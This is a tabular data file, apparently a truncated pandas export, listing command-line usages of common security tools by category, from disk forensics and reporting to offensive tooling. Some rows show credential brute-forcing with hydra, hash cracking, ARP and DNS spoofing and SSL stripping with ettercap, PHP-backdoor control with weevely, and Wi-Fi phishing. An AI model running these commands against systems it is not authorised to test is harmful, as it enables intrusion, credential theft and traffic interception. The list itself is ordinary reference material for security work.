147,exiftool,exiftool -csv evidence.jpg > metadata.csv,Export image metadata to a CSV file.,Metadata analysis,[-csv],https://exiftool.org/
148,exiftool,exiftool -a -u evidence.pdf,"Extract all metadata, including unknown tags, ...",Metadata analysis,"[-a, -u]",https://exiftool.org/
149,exiftool,exiftool -json evidence.jpg > metadata.json,Export image metadata to a JSON file.,Metadata analysis,[-json],https://exiftool.org/
150,foremost,foremost -t all -i image.dd -o output/,Recover files from a disk image based on file ...,File recovery,"[-t, -i, -o]",http://foremost.sourceforge.net/
151,foremost,foremost -t jpg -i image.dd -o output/,Recover JPEG files from a disk image.,File recovery,"[-t, -i, -o]",http://foremost.sourceforge.net/
152,foremost,foremost -t pdf -i image.dd -o output/,Recover PDF files from a disk image.,File recovery,"[-t, -i, -o]",http://foremost.sourceforge.net/
153,foremost,foremost -t docx -i image.dd -o output/,Recover DOCX files from a disk image.,File recovery,"[-t, -i, -o]",http://foremost.sourceforge.net/
154,guymager,guymager -o /case1/image.dd /dev/sda,Acquire a forensic disk image with a GUI inter...,Disk imaging,[-o],https://guymager.sourceforge.io/
155,guymager,guymager -c /case1/config.xml,Acquire a disk image using a configuration file.,Disk imaging,[-c],https://guymager.sourceforge.io/
156,guymager,guymager -l logfile /dev/sda,Acquire a disk image with logging.,Disk imaging,[-l],https://guymager.sourceforge.io/
157,photorec,photorec /dev/sda,Recover files from a disk based on file signat...,File recovery,[],https://www.cgsecurity.org/wiki/PhotoRec
158,photorec,photorec /d output/ /dev/sda,Recover files to a specified output directory.,File recovery,[/d],https://www.cgsecurity.org/wiki/PhotoRec
159,photorec,photorec /log /d output/ /dev/sda,Recover files with logging enabled.,File recovery,"[/log, /d]",https://www.cgsecurity.org/wiki/PhotoRec
160,scalpel,scalpel -c scalpel.conf -o output/ image.dd,Carve files from a disk image using a configur...,File carving,"[-c, -o]",https://github.com/sleuthkit/scalpel
161,scalpel,scalpel -b -o output/ image.dd,Carve files without headers from a disk image.,File carving,"[-b, -o]",https://github.com/sleuthkit/scalpel
162,sleuthkit,tsk_recover -a image.dd output/,Recover deleted files from a disk image.,File recovery,[-a],https://www.sleuthkit.org/sleuthkit/man/tsk_re...
163,sleuthkit,fls -r image.dd,List files and directories in a disk image.,Filesystem analysis,[-r],https://www.sleuthkit.org/sleuthkit/man/fls.html
164,sleuthkit,mmls image.dd,Display partition table of a disk image.,Partition analysis,[],https://www.sleuthkit.org/sleuthkit/man/mmls.html
165,sleuthkit,icat image.dd 12345 > file.txt,Extract a file by inode from a disk image.,File extraction,[],https://www.sleuthkit.org/sleuthkit/man/icat.html
166,sleuthkit,fsstat image.dd,Display filesystem details of a disk image.,Filesystem analysis,[],https://www.sleuthkit.org/sleuthkit/man/fsstat...
167,sleuthkit,blkls image.dd > slack_space.dat,Extract slack space from a disk image.,Slack space analysis,[],https://www.sleuthkit.org/sleuthkit/man/blkls....
168,strings,strings memory.dump > strings.txt,Extract printable strings from a memory dump.,Data extraction,[],https://www.man7.org/linux/man-pages/man1/stri...
169,testdisk,testdisk /dev/sda,Recover lost partitions and repair filesystems.,Partition recovery,[],https://www.cgsecurity.org/wiki/TestDisk
170,testdisk,testdisk /log /dev/sda,Recover partitions with logging enabled.,Partition recovery,[/log],https://www.cgsecurity.org/wiki/TestDisk
171,testdisk,testdisk /dev/sda /analyse,Analyze disk for partition recovery.,Partition recovery,[/analyse],https://www.cgsecurity.org/wiki/TestDisk
172,volatility,volatility -f memory.dump imageinfo,Identify memory image profile for further anal...,Memory forensics,[-f],https://www.volatilityfoundation.org/
173,volatility,volatility -f memory.dump --profile=Win7SP1x64...,List running processes from a memory dump.,Memory forensics,"[-f, --profile]",https://www.volatilityfoundation.org/
174,volatility,volatility -f memory.dump --profile=Win7SP1x64...,Analyze network connections in a memory dump.,Network forensics,"[-f, --profile]",https://www.volatilityfoundation.org/
175,volatility,volatility -f memory.dump --profile=Win7SP1x64...,Display command-line arguments of processes in...,Memory forensics,"[-f, --profile]",https://www.volatilityfoundation.org/
176,volatility,volatility -f memory.dump --profile=Win7SP1x64...,Dump memory of a specific process.,Memory forensics,"[-f, --profile, -p]",https://www.volatilityfoundation.org/
177,volatility,volatility -f memory.dump --profile=Win7SP1x64...,List registry hives in a memory dump.,Memory forensics,"[-f, --profile]",https://www.volatilityfoundation.org/
178,volatility,volatility -f memory.dump --profile=Win7SP1x64...,Scan for file objects in a memory dump.,Memory forensics,"[-f, --profile]",https://www.volatilityfoundation.org/

--- Category: Information Gathering ---

,tool,command,description,use_case,flags,reference_link
179,amass,amass enum -d example.com,Enumerate subdomains for a target domain.,Subdomain enumeration,"[enum, -d]",https://github.com/OWASP/Amass
180,amass,amass enum -d example.com,Enumerate subdomains for a target domain.,Subdomain enumeration,"[enum, -d]",https://github.com/OWASP/Amass
181,amass,amass track -d example.com,Track subdomain changes over time.,Subdomain tracking,"[track, -d]",https://github.com/OWASP/Amass
182,amass,amass intel -d example.com,Collect OSINT intelligence for a domain.,OSINT intelligence,"[intel, -d]",https://github.com/OWASP/Amass
183,dmitry,dmitry -i example.com,Gather WHOIS and host information.,Domain reconnaissance,[-i],https://www.kali.org/tools/dmitry/
...,...,...,...,...,...,...
266,whatweb,whatweb -v example.com,Perform verbose website technology scan.,Web reconnaissance,[-v],https://www.morningstarsecurity.com/research/w...
267,whatweb,whatweb --log-json=output.json example.com,Log website scan results to JSON.,Web reconnaissance,[--log-json],https://www.morningstarsecurity.com/research/w...
268,whois,whois example.com,Retrieve WHOIS information for a domain.,Domain reconnaissance,[],https://www.man7.org/linux/man-pages/man1/whoi...
269,whois,whois example.com,Retrieve WHOIS information for a domain.,Domain reconnaissance,[],https://www.man7.org/linux/man-pages/man1/whoi...
270,whois,whois 192.168.1.100,Retrieve WHOIS information for an IP address.,IP reconnaissance,[],https://www.man7.org/linux/man-pages/man1/whoi...

--- Category: Networking ---

,tool,command,description,use_case,flags,reference_link
271,metasploit,msfconsole -q -x 'use auxiliary/scanner/smb/sm...,Scan for SMB versions on a network range.,Service enumeration,"[-q, -x]",https://docs.metasploit.com/
272,metasploit,msfconsole -q -x 'use auxiliary/scanner/ftp/ft...,Scan for FTP service versions.,FTP enumeration,"[-q, -x]",https://docs.metasploit.com/
273,nmap,nmap -sV -p 1-65535 192.168.1.1,Scan all TCP ports and detect service versions...,Port scanning and service detection,"[-sV, -p]",https://nmap.org/book/man-briefoptions.html
274,nmap,nmap -sS -O 192.168.1.1,Perform a stealth SYN scan and OS detection.,Stealth scanning and OS fingerprinting,"[-sS, -O]",https://nmap.org/book/man-briefoptions.html
275,nmap,nmap -sU -p 1-1000 192.168.1.1,Scan UDP ports on a target host.,UDP port scanning,"[-sU, -p]",https://nmap.org/book/man-briefoptions.html
276,nmap,nmap -A 192.168.1.1,Perform aggressive scan with OS and service de...,Comprehensive host discovery,[-A],https://nmap.org/book/man-briefoptions.html
277,nmap,nmap --script vuln 192.168.1.1,Run vulnerability scanning scripts.,Vulnerability scanning,[--script],https://nmap.org/nsedoc/categories/vuln.html
278,nmap,nmap -sC 192.168.1.1,Run default Nmap scripts for service detection.,Service enumeration,[-sC],https://nmap.org/book/man-briefoptions.html
279,wireshark,wireshark -i eth0 -f 'tcp port 80',Capture and analyze TCP traffic on port 80.,Network traffic analysis,"[-i, -f]",https://www.wireshark.org/docs/
280,wireshark,wireshark -i eth0 -k,Start Wireshark with immediate packet capture ...,Real-time traffic analysis,"[-i, -k]",https://www.wireshark.org/docs/
281,wireshark,wireshark -r capture.pcap -Y 'http.request',Analyze HTTP requests in a saved capture file.,Packet analysis,"[-r, -Y]",https://www.wireshark.org/docs/

--- Category: Password Cracking ---

,tool,command,description,use_case,flags,reference_link
282,hashcat,hashcat -m 0 -a 0 hash.txt wordlist.txt,Crack MD5 hashes using a wordlist.,High-performance hash cracking,"[-m, -a]",https://hashcat.net/hashcat/
283,hashcat,hashcat -m 1000 -a 3 hash.txt ?d?d?d?d,Brute-force NTLM hashes with a 4-digit mask.,Mask-based hash cracking,"[-m, -a]",https://hashcat.net/hashcat/
284,hashcat,hashcat -m 1800 -a 0 hash.txt wordlist.txt,Crack SHA-512 crypt hashes using a wordlist.,Crypt hash cracking,"[-m, -a]",https://hashcat.net/hashcat/
285,hydra,hydra -l admin -P passwords.txt ftp://192.168.1.1,Brute-force FTP credentials using a password l...,Credential brute-forcing,"[-l, -P]",https://www.kali.org/tools/hydra/
286,hydra,hydra -L users.txt -P passwords.txt ssh://192....,Brute-force SSH credentials using user and pas...,SSH brute-forcing,"[-L, -P]",https://www.kali.org/tools/hydra/
287,hydra,hydra -l admin -P passwords.txt http-post-form...,Brute-force HTTP form-based authentication.,Web form brute-forcing,"[-l, -P]",https://www.kali.org/tools/hydra/
288,hydra,hydra -l root -P passwords.txt rdp://192.168.1.1,Brute-force RDP credentials.,RDP brute-forcing,"[-l, -P]",https://www.kali.org/tools/hydra/
289,hydra,hydra -l admin -P passwords.txt smtp://192.168...,Brute-force SMTP credentials.,SMTP brute-forcing,"[-l, -P]",https://www.kali.org/tools/hydra/
290,hydra,hydra -l admin -P passwords.txt telnet://192.1...,Brute-force Telnet credentials.,Telnet brute-forcing,"[-l, -P]",https://www.kali.org/tools/hydra/
291,john,john --wordlist=rockyou.txt hash.txt,Crack password hashes using a wordlist.,Password hash cracking,[--wordlist],https://www.openwall.com/john/
292,john,john --format=nt hash.txt,Crack NTLM hashes.,NTLM hash cracking,[--format],https://www.openwall.com/john/
293,john,john --format=sha512crypt hash.txt,Crack SHA-512 crypt hashes.,Crypt hash cracking,[--format],https://www.openwall.com/john/

--- Category: Post-Exploitation ---

,tool,command,description,use_case,flags,reference_link
294,bloodhound,bloodhound-python -u user -p pass -d domain.lo...,Collect Active Directory data for analysis.,AD enumeration,"[-u, -p, -d, -c]",https://github.com/BloodHoundAD/BloodHound
295,bloodhound,bloodhound-python -c DCOnly -d domain.local,Collect only Domain Controller data.,AD enumeration,"[-c, -d]",https://github.com/BloodHoundAD/BloodHound
296,bloodhound,bloodhound-python -u user -p pass --dns-tcp,Use TCP for DNS queries in AD collection.,AD enumeration,"[-u, -p, --dns-tcp]",https://github.com/BloodHoundAD/BloodHound
297,bloodhound,bloodhound-python -c All --zip,Compress collected AD data.,AD enumeration,"[-c, --zip]",https://github.com/BloodHoundAD/BloodHound
298,bloodhound,bloodhound-python -u user -p pass -gc dc.domai...,Target a specific Global Catalog server.,AD enumeration,"[-u, -p, -gc]",https://github.com/BloodHoundAD/BloodHound
...,...,...,...,...,...,...
367,weevely,weevely http://example.com/shell.php password ...,Gather system information via backdoor.,System enumeration,[],https://github.com/epinna/weevely3
368,weevely,weevely http://example.com/shell.php password ...,Delete a file via PHP backdoor.,File manipulation,[],https://github.com/epinna/weevely3
369,weevely,weevely http://example.com/shell.php password ...,Execute SQL query via backdoor.,Database access,[],https://github.com/epinna/weevely3
370,weevely,weevely http://example.com/shell.php password ...,Create a zip archive via backdoor.,Data exfiltration,[],https://github.com/epinna/weevely3
371,weevely,weevely http://example.com/shell.php password ...,Set up a proxy via backdoor.,Network pivoting,[],https://github.com/epinna/weevely3

--- Category: Reporting ---

,tool,command,description,use_case,flags,reference_link
372,dradis,dradis -o report.html,Generate an HTML report from Dradis findings.,Report generation,[-o],https://dradisframework.org/documentation/
373,dradis,dradis --export report.docx,Export Dradis project to DOCX report.,Report export,[--export],https://dradisframework.org/documentation/
374,dradis,dradis -t csv -o findings.csv,Export Dradis findings to CSV.,Report export,"[-t, -o]",https://dradisframework.org/documentation/
375,dradis,dradis --template custom.html -o report.html,Generate report using custom HTML template.,Report generation,"[--template, -o]",https://dradisframework.org/documentation/
376,dradis,dradis -o report.pdf,Generate a PDF report from Dradis.,Report generation,[-o],https://dradisframework.org/documentation/
377,dradis,dradis --import nmap.xml,Import Nmap XML results into Dradis.,Data import,[--import],https://dradisframework.org/documentation/
378,dradis,dradis -o report.json,Export Dradis project to JSON.,Report export,[-o],https://dradisframework.org/documentation/
379,dradis,dradis --import metasploit.xml,Import Metasploit XML results into Dradis.,Data import,[--import],https://dradisframework.org/documentation/
380,dradis,dradis -o report.xml,Export Dradis project to XML.,Report export,[-o],https://dradisframework.org/documentation/
381,faraday,faraday-cli report generate --format pdf --out...,Generate a PDF report from Faraday.,Report generation,"[--format, --output]",https://faradaysec.com/documentation/
382,faraday,faraday-cli report generate --format html --ou...,Generate an HTML report from Faraday.,Report generation,"[--format, --output]",https://faradaysec.com/documentation/
383,faraday,faraday-cli export --format xml --output repor...,Export Faraday data to XML.,Report export,"[--format, --output]",https://faradaysec.com/documentation/
384,faraday,faraday-cli report generate --format csv --out...,Generate a CSV report from Faraday.,Report generation,"[--format, --output]",https://faradaysec.com/documentation/
385,faraday,faraday-cli export --format json --output repo...,Export Faraday data to JSON.,Report export,"[--format, --output]",https://faradaysec.com/documentation/
386,faraday,faraday-cli report generate --template custom ...,Generate report using custom template.,Report generation,"[--template, --output]",https://faradaysec.com/documentation/
387,faraday,faraday-cli export --format docx --output repo...,Export Faraday data to DOCX.,Report export,"[--format, --output]",https://faradaysec.com/documentation/
388,faraday,faraday-cli report generate --format markdown ...,Generate a Markdown report from Faraday.,Report generation,"[--format, --output]",https://faradaysec.com/documentation/
389,faraday,faraday-cli export --format txt --output repor...,Export Faraday data to text.,Report export,"[--format, --output]",https://faradaysec.com/documentation/
390,metagoofil,metagoofil -d example.com -t pdf -o report.html,Generate HTML report of metadata findings.,Metadata reporting,"[-d, -t, -o]",https://github.com/laramies/metagoofil
391,metagoofil,metagoofil -d example.com -t doc -o report.txt,Generate text report of metadata findings.,Metadata reporting,"[-d, -t, -o]",https://github.com/laramies/metagoofil
392,metagoofil,metagoofil -d example.com -t xls -o report.csv,Generate CSV report of metadata findings.,Metadata reporting,"[-d, -t, -o]",https://github.com/laramies/metagoofil
393,metagoofil,metagoofil -d example.com -t ppt -o report.xml,Generate XML report of metadata findings.,Metadata reporting,"[-d, -t, -o]",https://github.com/laramies/metagoofil
394,metagoofil,metagoofil -d example.com -t all -o report.json,Generate JSON report of all metadata findings.,Metadata reporting,"[-d, -t, -o]",https://github.com/laramies/metagoofil
395,metasploit,msfconsole -x 'db_export -f xml -o report.xml',Export Metasploit database to XML report.,Report export,"[-x, -f, -o]",https://docs.metasploit.com/
396,metasploit,msfconsole -x 'db_export -f csv -o report.csv',Export Metasploit findings to CSV.,Report export,"[-x, -f, -o]",https://docs.metasploit.com/
397,metasploit,msfconsole -x 'report -t vulnerability -o vuln...,Generate a PDF vulnerability report.,Report generation,"[-x, -t, -o]",https://docs.metasploit.com/
398,metasploit,msfconsole -x 'db_export -f json -o report.json',Export Metasploit data to JSON.,Report export,"[-x, -f, -o]",https://docs.metasploit.com/
399,metasploit,msfconsole -x 'report -t host -o host_report.csv',Generate a CSV host report.,Report generation,"[-x, -t, -o]",https://docs.metasploit.com/
400,metasploit,msfconsole -x 'report -t service -o service_re...,Generate an HTML service report.,Report generation,"[-x, -t, -o]",https://docs.metasploit.com/
401,metasploit,msfconsole -x 'db_export -f html -o report.html',Export Metasploit data to HTML.,Report export,"[-x, -f, -o]",https://docs.metasploit.com/
402,metasploit,msfconsole -x 'report -t credential -o cred_re...,Generate a CSV credential report.,Report generation,"[-x, -t, -o]",https://docs.metasploit.com/
403,metasploit,msfconsole -x 'report -t vuln_detail -o vuln_d...,Generate detailed HTML vulnerability report.,Report generation,"[-x, -t, -o]",https://docs.metasploit.com/
404,metasploit,msfconsole -x 'report -t executive -o exec_rep...,Generate an executive PDF report.,Report generation,"[-x, -t, -o]",https://docs.metasploit.com/
405,nmap,nmap -oX scan.xml 192.168.1.100,Export Nmap scan results to XML.,Scan reporting,[-oX],https://nmap.org/book/man.html
406,nmap,nmap -oN scan.txt 192.168.1.100,Export Nmap scan results to text.,Scan reporting,[-oN],https://nmap.org/book/man.html
407,nmap,nmap -oG scan.grep 192.168.1.100,Export Nmap results in greppable format.,Scan reporting,[-oG],https://nmap.org/book/man.html
408,nmap,nmap --stylesheet nmap.xsl -oX scan.xml 192.16...,Export Nmap results to XML with stylesheet.,Scan reporting,"[--stylesheet, -oX]",https://nmap.org/book/man.html
409,nmap,nmap -oA scan 192.168.1.100,Export Nmap results in all formats.,Scan reporting,[-oA],https://nmap.org/book/man.html
410,nmap,nmap -oX scan.xml --webxml 192.168.1.100,Export Nmap results with web-friendly XML.,Scan reporting,"[-oX, --webxml]",https://nmap.org/book/man.html
411,nmap,nmap -oX scan.xml -v 192.168.1.100,Export verbose Nmap results to XML.,Scan reporting,"[-oX, -v]",https://nmap.org/book/man.html
412,nmap,nmap -oX scan.xml --no-stylesheet 192.168.1.100,Export Nmap results to XML without stylesheet.,Scan reporting,"[-oX, --no-stylesheet]",https://nmap.org/book/man.html
413,nmap,nmap -oX scan.xml -T4 192.168.1.100,Export Nmap results to XML with aggressive tim...,Scan reporting,"[-oX, -T4]",https://nmap.org/book/man.html
414,pandoc,pandoc report.md -o report.pdf,Convert Markdown report to PDF.,Format conversion,[-o],https://pandoc.org/MANUAL.html
415,pandoc,pandoc report.md -o report.docx,Convert Markdown report to DOCX.,Format conversion,[-o],https://pandoc.org/MANUAL.html
416,pandoc,pandoc report.md --pdf-engine=xelatex -o repor...,Convert Markdown to PDF using XeLaTeX.,Format conversion,"[--pdf-engine, -o]",https://pandoc.org/MANUAL.html
417,pandoc,pandoc report.md -o report.html,Convert Markdown report to HTML.,Format conversion,[-o],https://pandoc.org/MANUAL.html
418,pandoc,pandoc report.docx -o report.pdf,Convert DOCX report to PDF.,Format conversion,[-o],https://pandoc.org/MANUAL.html
419,pandoc,pandoc report.md -t latex -o report.tex,Convert Markdown to LaTeX for reporting.,Format conversion,"[-t, -o]",https://pandoc.org/MANUAL.html
420,pandoc,pandoc report.html -o report.pdf,Convert HTML report to PDF.,Format conversion,[-o],https://pandoc.org/MANUAL.html
421,pandoc,pandoc report.md --metadata title='PenTest Rep...,Convert Markdown to PDF with metadata.,Format conversion,"[--metadata, -o]",https://pandoc.org/MANUAL.html
422,pandoc,pandoc report.md -s -o report.html,Convert Markdown to standalone HTML.,Format conversion,"[-s, -o]",https://pandoc.org/MANUAL.html

--- Category: Reverse Engineering ---

,tool,command,description,use_case,flags,reference_link
423,binwalk,binwalk -e firmware.bin,Extract embedded files and firmware components.,Firmware analysis,[-e],https://github.com/ReFirmLabs/binwalk
424,binwalk,binwalk --signature firmware.bin,Analyze firmware for embedded signatures.,Firmware analysis,[--signature],https://github.com/ReFirmLabs/binwalk
425,binwalk,binwalk -M firmware.bin,Perform recursive analysis of firmware.,Firmware analysis,[-M],https://github.com/ReFirmLabs/binwalk
426,binwalk,binwalk -y filesystem firmware.bin,Extract filesystem from firmware.,Firmware analysis,[-y],https://github.com/ReFirmLabs/binwalk
427,binwalk,binwalk -B firmware.bin,Extract binary blobs from firmware.,Firmware analysis,[-B],https://github.com/ReFirmLabs/binwalk
...,...,...,...,...,...,...
506,strings,strings -t x binary,Extract strings with their hexadecimal offsets.,String extraction,[-t],https://www.man7.org/linux/man-pages/man1/stri...
507,strings,strings -e s binary,Extract single-byte encoded strings.,String extraction,[-e],https://www.man7.org/linux/man-pages/man1/stri...
508,strings,strings -tx binary > offsets.txt,Extract strings with their offsets in a file.,String extraction,[-tx],https://www.man7.org/linux/man-pages/man1/stri...
509,strings,strings -d binary,Extract strings from data sections only.,String extraction,[-d],https://www.man7.org/linux/man-pages/man1/stri...
510,strings,strings -e l binary,Extract little-endian encoded strings.,String extraction,[-e],https://www.man7.org/linux/man-pages/man1/stri...

--- Category: Sniffing and Spoofing ---

,tool,command,description,use_case,flags,reference_link
511,arpspoof,arpspoof -i eth0 -t 192.168.1.100 192.168.1.1,Spoof ARP packets to poison a target.,ARP spoofing,"[-i, -t]",https://www.kali.org/tools/dsniff/
512,arpspoof,arpspoof -i eth0 -t 192.168.1.1 192.168.1.100,Spoof ARP packets for bidirectional poisoning.,ARP spoofing,"[-i, -t]",https://www.kali.org/tools/dsniff/
513,arpspoof,arpspoof -i eth0 -t 192.168.1.100,Spoof ARP packets targeting a specific host.,ARP spoofing,"[-i, -t]",https://www.kali.org/tools/dsniff/
514,arpspoof,arpspoof -i eth0 -r -t 192.168.1.100,Spoof ARP packets with reverse poisoning.,ARP spoofing,"[-i, -r, -t]",https://www.kali.org/tools/dsniff/
515,arpspoof,arpspoof -i eth0 -t 192.168.1.100 -h 00:11:22:...,Spoof ARP packets with a specific MAC address.,ARP spoofing,"[-i, -t, -h]",https://www.kali.org/tools/dsniff/
516,dnsspoof,dnsspoof -i eth0 -f hosts.txt,Spoof DNS responses using a hosts file.,DNS spoofing,"[-i, -f]",https://www.kali.org/tools/dsniff/
517,dnsspoof,dnsspoof -i eth0 host 192.168.1.100,Spoof DNS for a specific host.,DNS spoofing,"[-i, host]",https://www.kali.org/tools/dsniff/
518,dnsspoof,dnsspoof -i eth0 udp port 53,Spoof DNS responses on UDP port 53.,DNS spoofing,"[-i, udp, port]",https://www.kali.org/tools/dsniff/
519,dnsspoof,dnsspoof -i eth0 -v,Spoof DNS responses with verbose output.,DNS spoofing,"[-i, -v]",https://www.kali.org/tools/dsniff/
520,dnsspoof,dnsspoof -i eth0 -d,Spoof DNS responses with debugging output.,DNS spoofing,"[-i, -d]",https://www.kali.org/tools/dsniff/
521,ettercap,ettercap -T -i eth0,Launch Ettercap in text mode for sniffing on e...,Network sniffing,"[-T, -i]",https://www.ettercap-project.org/documentation...
522,ettercap,ettercap -T -M arp /192.168.1.1/ /192.168.1.100/,Perform ARP poisoning between two hosts.,ARP spoofing,"[-T, -M]",https://www.ettercap-project.org/documentation...
523,ettercap,ettercap -T -P dns_spoof /192.168.1.0/24/,Perform DNS spoofing on a network.,DNS spoofing,"[-T, -P]",https://www.ettercap-project.org/documentation...
524,ettercap,ettercap -T -M dhcp:192.168.1.100/192.168.1.1/,Perform DHCP spoofing on a network.,DHCP spoofing,"[-T, -M]",https://www.ettercap-project.org/documentation...
525,ettercap,ettercap -T -P sslstrip /192.168.1.0/24/,Strip SSL from HTTPS traffic for sniffing.,SSL stripping,"[-T, -P]",https://www.ettercap-project.org/documentation...
526,ettercap,ettercap -T -u -i eth0,Sniff unified packets on eth0.,Unified sniffing,"[-T, -u, -i]",https://www.ettercap-project.org/documentation...
527,ettercap,ettercap -T -P mac_flood /192.168.1.0/24/,Perform MAC flooding to overwhelm switches.,MAC flooding,"[-T, -P]",https://www.ettercap-project.org/documentation...
528,ettercap,ettercap -T -P arp_storm /192.168.1.0/24/,Generate an ARP storm on the network.,ARP storming,"[-T, -P]",https://www.ettercap-project.org/documentation...
529,ettercap,ettercap -T -M port /192.168.1.100/ /192.168.1.1/,Perform port stealing for sniffing.,Port stealing,"[-T, -M]",https://www.ettercap-project.org/documentation...
530,ettercap,ettercap -T -P icmp_redirect /192.168.1.0/24/,Perform ICMP redirect spoofing.,ICMP spoofing,"[-T, -P]",https://www.ettercap-project.org/documentation...
531,macchanger,macchanger -r eth0,Randomize the MAC address of eth0.,MAC spoofing,[-r],https://www.kali.org/tools/macchanger/
532,macchanger,macchanger -m 00:11:22:33:44:55 eth0,Set a specific MAC address for eth0.,MAC spoofing,[-m],https://www.kali.org/tools/macchanger/
533,macchanger,macchanger -s eth0,Show the current MAC address of eth0.,MAC address inspection,[-s],https://www.kali.org/tools/macchanger/
534,macchanger,macchanger -b eth0,Set a burned-in MAC address for eth0.,MAC spoofing,[-b],https://www.kali.org/tools/macchanger/
535,macchanger,macchanger -e eth0,Set a MAC address similar to the original.,MAC spoofing,[-e],https://www.kali.org/tools/macchanger/
536,macchanger,macchanger -l,List known MAC address vendors.,MAC address reconnaissance,[-l],https://www.kali.org/tools/macchanger/
537,tcpdump,tcpdump -i eth0,Capture packets on eth0 interface.,Packet capturing,[-i],https://www.tcpdump.org/manpages/tcpdump.1.html
538,tcpdump,tcpdump -i eth0 -w capture.pcap,Save captured packets to a pcap file.,Packet capturing,"[-i, -w]",https://www.tcpdump.org/manpages/tcpdump.1.html
539,tcpdump,tcpdump -r capture.pcap,Read and analyze packets from a pcap file.,Packet analysis,[-r],https://www.tcpdump.org/manpages/tcpdump.1.html
540,tcpdump,tcpdump -i eth0 port 80,Capture HTTP traffic on eth0.,Protocol-specific capturing,"[-i, port]",https://www.tcpdump.org/manpages/tcpdump.1.html
541,tcpdump,tcpdump -i eth0 -c 100,Capture 100 packets on eth0.,Limited packet capturing,"[-i, -c]",https://www.tcpdump.org/manpages/tcpdump.1.html
542,tcpdump,tcpdump -i eth0 host 192.168.1.100,Capture packets to/from a specific host.,Host-specific capturing,"[-i, host]",https://www.tcpdump.org/manpages/tcpdump.1.html
543,tcpdump,tcpdump -i eth0 -vv,Capture packets with verbose output.,Detailed packet capturing,"[-i, -vv]",https://www.tcpdump.org/manpages/tcpdump.1.html
544,tcpdump,tcpdump -i eth0 -n,Capture packets without DNS resolution.,Packet capturing,"[-i, -n]",https://www.tcpdump.org/manpages/tcpdump.1.html
545,tcpdump,tcpdump -i eth0 -s 1500,Capture packets with a snaplen of 1500 bytes.,Packet capturing,"[-i, -s]",https://www.tcpdump.org/manpages/tcpdump.1.html
546,tshark,tshark -i eth0,Capture packets on eth0 using Tshark.,Packet capturing,[-i],https://www.wireshark.org/docs/man-pages/tshar...
547,tshark,tshark -r capture.pcap,Analyze packets from a pcap file.,Packet analysis,[-r],https://www.wireshark.org/docs/man-pages/tshar...
548,tshark,tshark -i eth0 -w output.pcap,Save captured packets to a pcap file.,Packet capturing,"[-i, -w]",https://www.wireshark.org/docs/man-pages/tshar...
549,tshark,tshark -i eth0 -f 'port 443',Capture HTTPS traffic on eth0.,Protocol-specific capturing,"[-i, -f]",https://www.wireshark.org/docs/man-pages/tshar...
550,tshark,tshark -i eth0 -T fields -e ip.src,Extract source IP addresses from captured pack...,Packet field extraction,"[-i, -T, -e]",https://www.wireshark.org/docs/man-pages/tshar...
551,tshark,tshark -i eth0 -c 100,Capture 100 packets on eth0.,Limited packet capturing,"[-i, -c]",https://www.wireshark.org/docs/man-pages/tshar...
552,tshark,"tshark -i eth0 -z io,stat,1",Display packet statistics every second.,Traffic statistics,"[-i, -z]",https://www.wireshark.org/docs/man-pages/tshar...
553,tshark,tshark -i eth0 -Y 'http.request',Filter and display HTTP requests.,Packet filtering,"[-i, -Y]",https://www.wireshark.org/docs/man-pages/tshar...
554,wireshark,wireshark,Launch Wireshark for network packet analysis.,Packet capturing,[],https://www.wireshark.org/docs/
555,wireshark,wireshark -i eth0,Capture packets on eth0 interface with Wireshark.,Interface-specific packet capturing,[-i],https://www.wireshark.org/docs/
556,wireshark,wireshark -r capture.pcap,Open a pcap file in Wireshark for analysis.,Packet analysis,[-r],https://www.wireshark.org/docs/
557,wireshark,wireshark -f 'tcp port 80' -i eth0,Capture HTTP traffic on eth0.,Protocol-specific capturing,"[-f, -i]",https://www.wireshark.org/docs/
558,wireshark,wireshark -Y 'http' -r capture.pcap,Filter HTTP packets in a pcap file.,Packet filtering,"[-Y, -r]",https://www.wireshark.org/docs/
559,wireshark,wireshark -i eth0 -k,Start capturing packets immediately on eth0.,Immediate packet capturing,"[-i, -k]",https://www.wireshark.org/docs/
560,wireshark,"wireshark -z io,stat,1 -i eth0",Display real-time packet statistics.,Traffic statistics,"[-z, -i]",https://www.wireshark.org/docs/

--- Category: Social Engineering ---

,tool,command,description,use_case,flags,reference_link
561,cupp,cupp -i,Run CUPP interactively to generate targeted wo...,Password profiling,[-i],https://github.com/Mebus/cupp
562,cupp,cupp -w target.txt,Generate a wordlist from a target profile file.,Password profiling,[-w],https://github.com/Mebus/cupp
563,cupp,cupp -a,Generate wordlists using all available profiles.,Password profiling,[-a],https://github.com/Mebus/cupp
564,cupp,cupp -l,List available profiles for wordlist generation.,Password profiling,[-l],https://github.com/Mebus/cupp
565,cupp,cupp -q,Run CUPP in quiet mode for minimal output.,Password profiling,[-q],https://github.com/Mebus/cupp
...,...,...,...,...,...,...
624,wifiphisher,wifiphisher -i wlan0 --logging,Enable logging for Wifiphisher attacks.,Wi-Fi phishing,"[-i, --logging]",https://wifiphisher.org/
625,wifiphisher,wifiphisher -i wlan0 --force-hostname,Force hostname resolution for phishing.,Wi-Fi phishing,"[-i, --force-hostname]",https://wifiphisher.org/
626,wifiphisher,wifiphisher -i wlan0 --noextensions,Run Wifiphisher without browser extensions.,Wi-Fi phishing,"[-i, --noextensions]",https://wifiphisher.org/
627,wifiphisher,wifiphisher -i wlan0 --dnsmasq,Use dnsmasq for DNS spoofing in phishing.,Wi-Fi phishing,"[-i, --dnsmasq]",https://wifiphisher.org/
628,wifiphisher,wifiphisher -i wlan0 --phishpage custom.html,Use a custom phishing page for Wi-Fi attacks.,Wi-Fi phishing,"[-i, --phishpage]",https://wifiphisher.org/

--- Category: Web Application ---

,tool,command,description,use_case,flags,reference_link
629,burpsuite,java -jar burpsuite.jar,Launch Burp Suite for web vulnerability testing.,Web application security testing,[],https://portswigger.net/burp/documentation
630,burpsuite,java -jar burpsuite.jar --proxy 127.0.0.1:8080,Start Burp Suite with a proxy listener.,Web traffic interception,[--proxy],https://portswigger.net/burp/documentation
631,burpsuite,java -jar burpsuite.jar --spider http://exampl...,Crawl a website using Burp Suite’s spider.,Website crawling,[--spider],https://portswigger.net/burp/documentation
632,burpsuite,java -jar burpsuite.jar,Launch Burp Suite for web vulnerability testing.,Web application security testing,[],https://portswigger.net/burp/documentation
633,burpsuite,java -jar burpsuite.jar --proxy 127.0.0.1:8080,Start Burp Suite with a proxy listener.,Web traffic interception,[--proxy],https://portswigger.net/burp/documentation
...,...,...,...,...,...,...
710,wpscan,wpscan --url http://example.com --passwords pa...,Brute-force WordPress login credentials.,WordPress brute-forcing,"[--url, --passwords]",https://wpscan.com/wordpress-security-scanner
